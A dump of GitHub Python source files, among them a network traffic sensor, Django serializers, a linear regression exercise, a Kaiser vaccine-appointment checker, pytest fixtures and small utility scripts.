custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tshark_obj.run()\n\ndef pcap_analysis(work_queue):\n\tpcap_obj = tcp_http_pcap(pcap_collection_data, int(max_queue_size), work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tpcap_obj.run()\n\nclass thread_msg_send(threading.Thread):\n\tdef __init__(self, work_queue, msg_send_mode):\n\n\t\tthreading.Thread.__init__(self)\n\t\tself.work_queue = work_queue\n\t\tself.msg_send_mode = msg_send_mode\n\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\n\tdef msg_obj_fun(self, msg_send_mode):\n\t\tif msg_send_mode == \"TCP\":\n\t\t\tmsg_obj = _tcp_msg_send(server_ip,server_port)\n\t\telif msg_send_mode == \"HTTP\":\n\t\t\thttp_url = \"http://{}:{}/\".format(server_ip,server_port)\n\t\t\tmsg_obj = _http_msg_send(http_url)\n\t\telif msg_send_mode == \"SYSLOG\":\n\t\t\tmsg_obj = _syslog_msg_send(server_ip,server_port)\n\t\telse:\n\t\t\tmsg_obj = ''\n\t\treturn msg_obj\n\n\tdef run(self):\n\t\ttcp_flag = True if self.msg_obj else False\n\t\t# total_msg_num = 0\n\t\twhile True:\n\t\t\t# start = time.time()\n\t\t\tif not tcp_flag:\n\t\t\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\t\t\tif len(self.work_queue):\n\t\t\t\tresult = self.work_queue.popleft()\n\t\t\t\tif msg_send_mode == \"TCP\":\n\t\t\t\t\ttcp_flag = self.msg_obj.info(result)\n\t\t\t\t\t# total_msg_num += 1\n\t\t\t\t\t# if total_msg_num%100 == 0:\n\t\t\t\t\t\t# end = time.time()\n\t\t\t\t\t\t# print(\"Used Time: %s\"%(end - start))\n\t\t\t\telse:\n\t\t\t\t\tself.msg_obj.info(result)\n\n\t\nif __name__ == '__main__':\n\n\t# 宿主机crontab方式启动\n\t# */5 * * * * root /usr/bin/python3 /passets-sensor/main.py >> /dev/null 2>&1\n\t# check_lock()\n\n\ttry:\n\t\topts,args = getopt.getopt(sys.argv[1:],'i: s: p: d: t: r: c: T: S:')\n\texcept:\n\t\tUsage()\n\tif len(opts) < 3:\n\t\tUsage()\n\n\tfor o, a in opts:\n\t\tif o == \"-i\":\n\t\t\tinterface = str(a)\n\t\tif o == '-s':\n\t\t\tserver_ip = str(a)\n\t\tif o == '-t':\n\t\t\tcustom_tag = str(a)\n\t\tif o == '-p': \n\t\t\tserver_port = int(a)\n\t\tif o == '-d':\n\t\t\tdebug_str = str(a)\n\t\t\tif debug_str == 'on':\n\t\t\t\tdebug = True\n\t\tif o == '-r':\n\t\t\treturn_switch_str = str(a)\n\t\t\tif return_switch_str == 'on':\n\t\t\t\treturn_deep_info = True\n\t\t\telse:\n\t\t\t\treturn_deep_info = False\n\t\tif o == '-c':\n\t\t\tcache_size = int(a)\n\t\tif o == '-S':\n\t\t\tsession_size = int(a)\n\t\t\tif session_size == 0:\n\t\t\t\tsession_size = 1024\n\t\tif o == '-T':\n\t\t\ttimeout = int(a)\n\n\tif interface and server_ip and server_port:\n\t\t# 接受通过环境变量传入的过滤设置\n\t\tif 'http_filter_code' in os.environ:\n\t\t\thttp_filter['response_code'] = list(set(filter(None, os.environ[\"http_filter_code\"].replace(\" \",\"\").split(\",\"))))\n\t\tif 'http_filter_type' in os.environ:\n\t\t\thttp_filter['content_type'] = list(set(filter(None, os.environ[\"http_filter_type\"].replace(\" \",\"\").split(\",\"))))\n\t\tbpf_filter += ' and not (host {} and port {}) and not (host 127.0.0.1 or host localhost) '.format(server_ip,server_port)\n\n\t\ttry:\n\t\t\t# work_queue = queue.LifoQueue(max_queue_size)\n\t\t\twork_queue = collections.deque(maxlen=int(max_queue_size))\n\t\t\t\n\t\t\tfor i in range(msg_send_thread_num):\n\t\t\t\tmsg_thread_obj = thread_msg_send(work_queue, msg_send_mode)\n\t\t\t\tmsg_thread_obj.setDaemon(True)\n\t\t\t\tmsg_thread_obj.start()\n\n\t\t\tif engine == 'PCAP':\n\t\t\t\tpcap_analysis(work_queue)\n\t\t\telif engine == 'TSHARK':\n\t\t\t\ttshark_analysis(work_queue)\n\n\t\texcept KeyboardInterrupt:\n\t\t\tprint('\\nExit.')\n\t\t\tos.kill(os.getpid(),signal.SIGKILL)\n\t\texcept :\n\t\t\ttraceback.print_exc()\n\telse:\n\t\tUsage()","repo_name":"DSO-Lab/passets-sensor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"12679565618","text":"from dj_rest_auth.registration.serializers import RegisterSerializer\nfrom dj_rest_auth.serializers import LoginSerializer\nfrom django.contrib.auth import get_user_model, models\nfrom drf_extra_fields.fields import Base64ImageField\nfrom drf_spectacular.utils import extend_schema_field\nfrom rest_framework import serializers\n\nfrom admin.utils import get_timestamp_path\nfrom users.models import CustomUser, Contact\n\n\nclass AuthLoginSerializer(LoginSerializer):\n username = None\n\n\nclass CustomRegisterSerializer(RegisterSerializer):\n username = None\n first_name = serializers.CharField(required=True, write_only=True)\n last_name = serializers.CharField(required=True, write_only=True)\n email = serializers.EmailField(required=True)\n password1 = serializers.CharField(required=True, write_only=True)\n password2 = serializers.CharField(required=True, write_only=True)\n is_builder = serializers.BooleanField(required=True)\n\n def custom_signup(self, request, user):\n user.is_builder = self.validated_data.get('is_builder', user.is_builder)\n user.save(update_fields=['is_builder'])\n\n def get_cleaned_data(self):\n return {\n 'first_name': self.validated_data.get('first_name', ''),\n 'last_name': self.validated_data.get('last_name', ''),\n 'password1': self.validated_data.get('password1', ''),\n 'email': self.validated_data.get('email', ''),\n 'is_builder': self.validated_data.get('is_builder', '')\n }\n\n\nclass ContactSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contact\n fields = ['id', 'first_name', 'last_name', 'phone', 'email']\n read_only_fields = ['id']\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n agent_contacts = ContactSerializer()\n avatar = Base64ImageField(required=False)\n\n def update(self, instance, validated_data):\n # Add your custom logic here for updating the instance\n # For example, you can update specific fields of the instance based on the validated_data\n if 'agent_contacts' in validated_data:\n contact = Contact.objects.get(user=instance)\n contact.email = validated_data['agent_contacts'].get('email', contact.email)\n contact.phone = validated_data['agent_contacts'].get('phone', contact.phone)\n contact.first_name = validated_data['agent_contacts'].get('first_name', contact.first_name)\n contact.last_name = validated_data['agent_contacts'].get('last_name', contact.last_name)\n contact.save()\n # You can also perform any additional custom operations\n instance.email = validated_data.get('email', instance.email)\n instance.phone = validated_data.get('phone', instance.phone)\n instance.avatar = validated_data.get('avatar', instance.avatar)\n instance.first_name = validated_data.get('first_name', instance.first_name)\n instance.last_name = validated_data.get('last_name', instance.last_name)\n instance.notification_type = validated_data.get('notification_type', instance.notification_type)\n instance.redirect_notifications_to_agent = validated_data.get('redirect_notifications_to_agent',\n instance.redirect_notifications_to_agent)\n instance.save()\n\n return instance\n\n class Meta:\n model = CustomUser\n fields = [\n 'id',\n 'first_name',\n 'last_name',\n 'phone',\n 'email',\n 'avatar',\n 'is_active',\n 'is_staff',\n 'last_login',\n 'date_joined',\n 'notification_type',\n 'agent_contacts',\n 'redirect_notifications_to_agent',\n ]\n","repo_name":"DanilHushchyn/SwipeAPI","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70530548842","text":"import numpy as np\n\nclass MyLinearRegression():\n \"\"\"\n Description:\n My personnal linear regression class to fit like a boss.\n \"\"\"\n\n def __init__(self, thetas, alpha=0.001, max_iter=1000):\n if not isinstance(thetas, np.ndarray) or thetas.size == 0:\n return None\n self.alpha = alpha\n self.max_iter = max_iter\n self.thetas = thetas\n\n def DataChecker(func):\n def wrapper(self, *args, **kwargs):\n for item in args:\n if not isinstance(item, np.ndarray)\\\n or not np.issubdtype(item.dtype, np.number):\n return None\n res = func(self, *args, **kwargs)\n return res\n return wrapper\n\n @DataChecker\n def fit_(self, x, y):\n\n X = np.insert(x, 0, 1, axis=1)\n for _ in range(self.max_iter):\n self.thetas = self.thetas - self.alpha\\\n * (X.T @ ((X @ self.thetas) - y)) / y.shape[0]\n\n return self.thetas\n\n @DataChecker\n def predict_(self, x):\n\n x = x.reshape(-1, 1) if len(x.shape) < 2 else x\n X = np.insert(x, 0, 1, axis=1)\n\n theta = self.thetas.reshape(-1, 1) if len(self.thetas.shape) < 2 else self.thetas\n\n if X.shape[1] != theta.shape[0] and theta.shape != (2, 1):\n return None\n\n return X @ theta\n\n @DataChecker\n def loss_elem_(self, y, y_hat):\n\n return (y - y_hat)**2\n\n @DataChecker\n def loss_(self, y, y_hat):\n\n return float(sum((y - y_hat)**2)/(2 * y.shape[0]))\n\n @staticmethod\n def mse_(y, y_hat):\n\n return float(sum((y - y_hat)**2)/(y.shape[0]))\n\nif __name__ == '__main__':\n import math\n import numpy as np\n from my_linear_regression import MyLinearRegression as MyLR\n x = np.array([[12.4956442], [21.5007972], [31.5527382], [48.9145838], [57.5088733]])\n y = np.array([[37.4013816], [36.1473236], [45.7655287], [46.6793434], [59.5585554]])\n lr1 = MyLR(np.array([[2], [0.7]]))\n\n # Example 0.0:\n y_hat = lr1.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[10.74695094],\n ## [17.05055804],\n ## [24.08691674],\n ## [36.24020866],\n ## [42.25621131]])\n\n # Example 0.1:\n print(lr1.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[710.45867381],\n ## [364.68645485],\n ## [469.96221651],\n ## [108.97553412],\n ## [299.37111101]])\n\n # Example 0.2:\n print(lr1.loss_(y, y_hat), '\\n')\n # Output:\n ## 195.34539903032385\n\n # Example 1.0:\n lr2 = MyLR(np.array([[1], [1]]), 5e-8, 1500000)\n lr2.fit_(x, y)\n print(lr2.thetas, '\\n')\n # Output:\n #array([[1.40709365],\n #[1.1150909 ]])\n\n # Example 1.1:\n y_hat = lr2.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[15.3408728 ],\n ## [25.38243697],\n ## [36.59126492],\n ## [55.95130097],\n ## [65.53471499]])\n\n # Example 1.2:\n print(lr2.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[486.66604863],\n ## [115.88278416],\n ## [ 84.16711596],\n ## [ 85.96919719],\n ## [ 35.71448348]])\n\n # Example 1.3:\n print(lr2.loss_(y, y_hat), '\\n')\n # Output:\n ## 80.83996294128525\n","repo_name":"BenElhadj/42-Piscine-ML","sub_path":"ML01/ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39885873059","text":"# -*- coding: utf-8 -*-\nfrom gluon import *\n\n\ndef Fase_Table(db, T):\n db.define_table('Fase',\n Field('numero', 'integer',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un numero de identificacion')],\n label='Numero'),\n Field('plan_trabajo', 'reference Plan_Trabajo',\n label='Pasantía (*)',\n writable=False),\n Field('objetivo_especifico', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un objetivo')],\n label='Objetivo Específico'),\n Field('descripcion', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario una Descripcion')],\n label='Descripción'),\n format=lambda r: '%s - %s' % (r.numero, r.objetivo_especifico)\n )\n","repo_name":"cadena-si-usb/SPE","sub_path":"applications/SPE_lib/modules/db_6_Fase.py","file_name":"db_6_Fase.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70334218604","text":"# 官方文档https://learning-pytest.readthedocs.io/zh/latest/doc/fixture/intro.html\n\nimport pytest\n\n'''\n@pytest.fixture(scope='session', autouse=True)\ndef fixture_session():\n print('\\n测试所有用例开始session####################')\n yield\n print('\\n测试所有用例结束session####################')\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef fixture_function():\n print('\\n function每个测试用例开始####################')\n yield\n print('\\n function每个测试用例结束####################')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef fixture_module():\n print('\\n 每个模块测试用例开始module===================>')\n yield\n print('\\n 每个模块测试用例结束module===================>')\n\n\n@pytest.fixture(scope='class', autouse=True)\ndef fixture_class():\n print('\\n 每个模块测试用例开始class===================>')\n yield\n print('\\n 每个模块测试用例结束class===================>')\n\n\n'''\n\n@pytest.fixture(scope='session', name='lg')\ndef login_and_loginout():\n print(\"\\n登录xxxxxx,获取token...\")\n token = '9999999'\n yield token\n print('\\n退出登录####################')\n\n\n\n","repo_name":"loomz/testcase_time_geek","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"13798745406","text":"import time\nimport urllib.parse\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nimport requests\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\nfrom checker.common.report_object import ReportObject\nfrom checker.common.setup_logger import logger\nfrom checker.common.session_object import SessionObject\nfrom checker.common.twilio_notifier import TwilioNotifier\n\nfrom dotenv import load_dotenv\n\nfrom checker.exception.login_exception import LoginExpiredException\nfrom checker.exception.token_exception import TokenExpiredException\n\nload_dotenv()\n\nclass KaiserNorCal:\n\n LOGIN_REQUEST = 'https://mydoctor.kaiserpermanente.org/ncal/appointments/#/selectFacility/covid19-vaccination/dose1-evisit'\n FACILITIES_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_DELETE = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/slot-locks'\n\n def __init__(self):\n self.name = \"Kaiser Northern California\"\n self.session = SessionObject()\n self.facilities = []\n\n ##-------------------------------\n ## EXECUTE\n ##-------------------------------\n\n def execute(self):\n start = time.perf_counter()\n\n report = ReportObject()\n report.strategy = self.name\n\n #build the session here\n if not self.session.is_active():\n #if login is expired, we should probbaly build both\n if not self.session.is_login_active():\n logger.info('building full session...')\n if self.do_login(True):\n self.get_facilities()\n else:\n logger.warning('unable to build login')\n if not self.session.is_token_active():\n logger.info('refreshing token...')\n self.get_facilities()\n\n #start processing - at this point we hopefully have a valid session\n if self.session.is_active():\n logger.info('making requests...')\n for facility in self.facilities:\n status = self.check_slots_by_facility(facility)\n report.add_facility(facility, status)\n else:\n logger.warning('session was not active, something happened')\n\n end = time.perf_counter()\n\n report.duration=end-start\n logger.info(report.to_string())\n\n return report\n\n ##-------------------------------\n\n def check_slots_by_facility(self, facility_code):\n logger.debug('checking for slots in facility '+ facility_code)\n #hit facility\n status = self.request_slots(facility_code)\n\n #if there is a slot - open browser, force cookies\n if status==1:\n self.get_appointment()\n else:\n #delete the appointment\n self.delete_appointment()\n\n return status\n\n ##-------------------------------\n ## HELPER METHODS\n ##-------------------------------\n\n def do_login(self, is_headless):\n login_u = os.getenv('KAISER_LOGIN')\n login_p = os.getenv('KAISER_PASSWORD')\n browser_path = os.getenv('PATH_TO_FIREFOX_DRIVER')\n\n #set the time when i rebuild this\n self.created_at=time.time()\n self.session.set_login(login_u)\n\n opts = Options()\n opts.headless = is_headless\n browser = Firefox(options=opts, executable_path=browser_path)\n browser.get(self.LOGIN_REQUEST)\n\n login_username_field = browser.find_element_by_id('username')\n login_username_field.send_keys(login_u)\n login_password_field = browser.find_element_by_id('password')\n login_password_field.send_keys(login_p)\n\n login_submit = browser.find_element_by_id('sign-on')\n login_submit.submit()\n\n # need the browser to load the my doctor online page\n delay = 5\n try:\n WebDriverWait(browser, delay).until(EC.presence_of_element_located((By.ID, 'member-select-id')))\n logger.debug('Page loaded.')\n except TimeoutException:\n logger.warning('Loading took too long...')\n return False\n\n self.session.set_cookies_raw(browser.get_cookies())\n logger.debug(f\"COOKIE: {self.session.cookies}\")\n\n if is_headless:\n browser.close()\n\n #TODO: need to create a condition where the login doesnt work\n\n return True\n\n ##-------------------------------\n\n def get_facilities(self):\n logger.debug('getting facility list and token...')\n\n headers = {'Cookie': self.session.cookies}\n\n try:\n response = requests.get(self.FACILITIES_REQUEST, headers=headers)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n #most likely login is out of date\n raise LoginExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n\n if 'token' in t:\n token = t['token']\n logger.debug(f\"TOKEN: {token}\")\n self.session.set_token(token)\n\n return t\n else:\n logger.warning('Response for facilities was empty')\n\n return None\n\n\n ##-------------------------------\n\n def request_slots(self, facility):\n logger.debug('requesting slots for '+ facility)\n\n sd = time.strftime('%d/%m/%Y')\n sd_str = urllib.parse.quote_plus(sd)\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n params['showFirstAvailable'] = 'true'\n params['startDate'] = sd_str\n params['bookingGuideline'] = 'COVIDVACCINE'\n\n uri = f\"{self.SLOT_REQUEST}/{facility}/slot-locks\"\n headers = {'Cookie': self.session.cookies, 'Content-Type': 'application/json'}\n\n try:\n response = requests.post(uri, headers=headers, params=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n # most likely login is out of date\n raise TokenExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n if not t['slots']:\n logger.info(f\"No slots available at: {facility}\")\n return 0\n else:\n logger.info(t)\n\n appointmentList = []\n for sl in t['slots']:\n appt = f\"* {sl['facilityName']} at {sl['appointmentDate']} {sl['appointmentTime']}\"\n appointmentList.append(appt)\n\n logger.info(f\"SLOTS AVAILABLE: {facility}\")\n TwilioNotifier.send_notification(f\"Vaccine slot(s) at {facility} - {'|'.join(appointmentList)}\")\n return len(appointmentList)\n\n logger.warning(f\"Response for slots at {facility} was empty\")\n return -1\n\n ##-------------------------------\n\n def delete_appointment(self):\n logger.debug('cleaning up appointments related to token...')\n\n headers = {'Cookie': self.session.cookies}\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n\n try:\n response = requests.delete(self.SLOT_DELETE, headers=headers, params=params)\n except requests.exceptions.HTTPError as errh:\n logger.error(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n\n ##-------------------------------\n\n def get_appointment(self):\n self.do_login(False)\n self.delete_appointment()","repo_name":"macgngsta/python-product-checker","sub_path":"checker/strategy/kaiser_norcal_strategy.py","file_name":"kaiser_norcal_strategy.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"18864913870","text":"def isBodyValid(body):\r\n valid = 0\r\n if len(body) == 3:\r\n valid += 1\r\n keyList = ['id', 'player', 'position']\r\n subkeyList = ['x','y']\r\n if all(key in body for key in keyList):\r\n valid += 1\r\n if all(subkey in body['position'] for subkey in subkeyList):\r\n valid += 1\r\n if body['position']['x']<3 and body['position']['x']>=0:\r\n valid += 1\r\n if body['position']['y']<3 and body['position']['y']>=0:\r\n valid += 1\r\n if valid == 5:\r\n return True\r\n else:\r\n return False","repo_name":"ftcRibeiro/jogoDaVelha","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"24429859531","text":"name = \"qualityCheck\"\n\nversion = \"0.0.0\"\n\nauthors = [\"ArtFx TD gang\"]\n\ndescription = \\\n \"\"\"\n Python maya Packages.\n Use to converse with Maya dcc\n \"\"\"\n\nrequires = [\n \"python\",\n \"checkLib\",\n \"PySide2\",\n \"shiboken2\"\n]\nvcs = \"git\"\n\n\ndef commands():\n global env\n env.PATH.append(\"{root}/lib\")\n env.PYTHONPATH.append(\"{root}/lib\")\n\n\ntests = {\n \"unit\": \"python -m unittest discover -s {root}/tests\",\n \"lint\": {\n \"command\": \"pylint scripts\",\n \"requires\": [\"pylint\"],\n \"run_on\": [\"default\", \"pre_release\"]\n },\n \"maya\": {\n \"command\": \"mayapy {root}/tests/qualitycheck_test.py\",\n \"requires\": [\"maya\"],\n \"run_on\": \"explicit\"\n },\n}\n","repo_name":"Soulayrol/Pipeline","sub_path":"packages/artfx/qualityCheck/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"6244569144","text":"from multiprocessing import Pool, cpu_count\nimport numpy as np\nimport os, imghdr\nfrom shutil import copy\nimport pandas as pd\nfrom time import sleep\nfrom scipy.spatial import distance_matrix\nfrom PyQt5 import QtCore\n\nimport CHUBACAPP.utils.pyvista_utils as pv_utils\nimport CHUBACAPP.utils.sfm as sfm\nimport CHUBACAPP.post_reprojection.permutator as pm\nimport CHUBACAPP.blender.blender_reprojection as brp\nimport CHUBACAPP.utils.export_annotations as exp_tools\n\n\nclass DISThread(QtCore.QThread):\n \"\"\"Detects the blurry image and store their reference for later suppression\"\"\"\n prog_val = QtCore.pyqtSignal(int)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, sfm_path, model_path, camera_model, img_path, method):\n super(DISThread, self).__init__()\n self.running = True\n self.sfm_path = sfm_path\n self.model_path = model_path\n self.camera_model = camera_model\n self.img_path = img_path\n self.method = method\n\n def run(self):\n disjoint_image_selection(self.sfm_path, self.model_path, self.camera_model, self.img_path, self.method, self)\n\n\ndef disjoint_image_selection(sfm_path, model_path, camera_model, img_path, method, thread=None):\n dist_filter = 12\n\n output_path = os.path.join(img_path, \"disjoint_img_selection\")\n isExist = os.path.exists(output_path)\n if not isExist:\n os.makedirs(output_path)\n\n print(\"Initiating...\")\n if thread is not None:\n thread.prog_val.emit(round(0))\n\n sfm_data = sfm.sfm_data_handler(sfm_path, None, True)\n camera_points = sfm.extract_camera_points(sfm_data)\n dm = camera_points_distance_matrix(camera_points)\n list_img_model = camera_points['filename'].unique()\n list_img = list_image_in_model(img_path, list_img_model)\n print(\"Done !\")\n\n print(\"Getting image bound... {} images to reproject\".format(len(list_img)))\n json_path = get_bounds(list_img, sfm_path, model_path, output_path, camera_model)\n print(\"Done !\")\n\n print(\"Getting contact matrix...\")\n M, volumes = contact_matrix(json_path, dm, dist_filter, thread)\n pd.DataFrame(M).to_csv(os.path.join(output_path, 'contact_matrix.csv'), index=False, header=False)\n print(\"Done !\")\n\n print(\"Image selection...\")\n if method == \"Forward\":\n keep = pm.forward(M)\n elif method == \"permutations\":\n keep = pm.permutate(M)\n else:\n print(\"Not a valid method, aborting...\")\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 0\n print(\"Done !\")\n\n pv_utils.save_volumes(volumes, keep, output_path)\n filter_images(img_path, keep, volumes)\n print(\"Saved !\")\n\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 1\n\n\ndef contact_matrix(json_path, dm, dist_filter, thread=None):\n annotations = pv_utils.parse_annotation(json_path)\n ann_volumes = []\n if thread is not None:\n thread.prog_val.emit(0)\n prog = 0\n tot_len = len(annotations)\n for annotation in annotations:\n if thread is not None:\n thread.prog_val.emit(round((prog / tot_len) * 100))\n prog += 1\n if annotation[0] == 'bound' and len(annotation[1]) != 1:\n mesh = pv_utils.points_to_mesh(annotation[1])\n volume = pv_utils.get_volume(mesh)\n filename = annotation[2]\n ann_volumes.append([filename, volume])\n\n print(\"Starting contact analysis... {} images to analyse\".format(len(ann_volumes)))\n contact_matrix = np.zeros(shape=(len(ann_volumes), len(ann_volumes)))\n if thread is not None:\n thread.prog_val.emit(0)\n tot_len = len(ann_volumes)\n for i in range(len(ann_volumes)):\n if thread is not None:\n thread.prog_val.emit(round((i / tot_len) * 100))\n for j in range(len(ann_volumes)):\n if dm[i, j] < dist_filter:\n k, intersection = ann_volumes[i][1].collision(ann_volumes[j][1], 1)\n if intersection:\n contact_matrix[i, j] = 1\n print(\"Done !\")\n\n return contact_matrix, ann_volumes\n\n\ndef camera_points_distance_matrix(camera_points):\n positions = []\n for index, row in camera_points.iterrows():\n positions.append([float(row['x']), float(row['y']), float(row['z'])])\n\n dm = distance_matrix(positions, positions)\n return dm\n\n\ndef multi_process_reprojection(args):\n sfm_path, model_path, list_imgs, camera_model, annotations, i = args\n sleep(i * 10) # avoid problems in json read\n ann23d = brp.annotationsTo3D(sfm_path, model_path, list_imgs, camera_model)\n\n polygon = []\n for image in list_imgs:\n result = ann23d.reproject(annotations, image, False)\n polygon.extend(result[2])\n\n return polygon\n\n\ndef get_bounds(list_imgs, sfm_path, model_path, output_path, camera_model):\n multipro = True\n annotations = pd.DataFrame(\n columns=['filename', 'shape_name', 'points', 'label_name', 'label_hierarchy', 'annotation_id'])\n\n nb_processes = cpu_count()\n img_list_split = np.array_split(list_imgs, nb_processes)\n args = []\n i = 0\n for img_list_i in img_list_split:\n args.append([sfm_path, model_path, img_list_i, camera_model, annotations, i])\n i += 1\n\n if multipro:\n print(\"Starting multiprocessing reprojection...\")\n results = list(Pool(nb_processes).map(multi_process_reprojection, args))\n print(\"Done !\")\n\n else:\n results = []\n for arg in args:\n results.append(multi_process_reprojection(arg))\n\n polygon = []\n for result in results:\n polygon.extend(result)\n\n json_path = exp_tools.save_bounds_polygons(output_path, polygon)\n\n return json_path\n\n\ndef filter_images(data_path, keep, volumes):\n img_to_keep = []\n for i in range(len(volumes)):\n if keep[i]:\n img_to_keep.append(volumes[i][0])\n\n select_path = os.path.join(data_path, \"disjoint_img_selection\")\n isExist = os.path.exists(select_path)\n if not isExist:\n os.makedirs(select_path)\n\n for file in os.listdir(data_path): # for each image in the directory\n if os.path.isfile(os.path.join(data_path, file)): # Check if is a file\n if imghdr.what(os.path.join(data_path, file)) == \"jpeg\":\n if file in img_to_keep:\n copy(os.path.join(data_path, file), select_path)\n\n\ndef list_image_in_model(dir, img_in_model):\n list_img = []\n for file in os.listdir(dir): # for each image in the directory\n if os.path.isfile(os.path.join(dir, file)): # Check if is a file\n if imghdr.what(os.path.join(dir, file)) == \"jpeg\":\n if file in img_in_model:\n list_img.append(file)\n return list_img\n","repo_name":"marinmarcillat/CHUBACAPP","sub_path":"CHUBACAPP/post_reprojection/no_overlap.py","file_name":"no_overlap.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"24983499100","text":"\"\"\"\n状态压缩+前缀异或和\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n def wonderfulSubstrings(self, word: str) -> int:\n dic = Counter([0])\n ans = 0\n mask = 0\n\n for ch in word:\n step = ord(ch) - ord('a')\n mask ^= (1 << step)\n if mask in dic:\n ans += dic[mask]\n for i in range(10):\n pre_mask = mask ^ (1 << i)\n if pre_mask in dic:\n ans += dic[pre_mask]\n dic[mask] += 1\n \n return ans","repo_name":"thorseraq/leetcode-playground","sub_path":"python/进阶/5799. 最美子字符串的数目.py","file_name":"5799. 最美子字符串的数目.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"42833107081","text":"from django.contrib import admin\nfrom .models import Movie\n\nclass MovieList(admin.ModelAdmin):\n list_display = ('name', 'year', 'description', 'rating')\n list_filter = ('name', 'year', 'rating')\n search_fields = ('name', 'description')\n ordering = ['year']\n\n\nadmin.site.register(Movie, MovieList)\n\n","repo_name":"boboyan/assignment2part2","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"31098267215","text":"class Solution:\n def minAddToMakeValid(self, S: str) -> int:\n uncom = 0\n toadd = 0\n for c in S:\n if c == '(':\n uncom += 1\n else:\n if uncom == 0:\n toadd += 1\n else:\n uncom -= 1\n return uncom + toadd\n\nif __name__ == \"__main__\":\n print(Solution().minAddToMakeValid('))(())('))\n\n","repo_name":"johnxguo/leetcode","sub_path":"921/921.py","file_name":"921.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
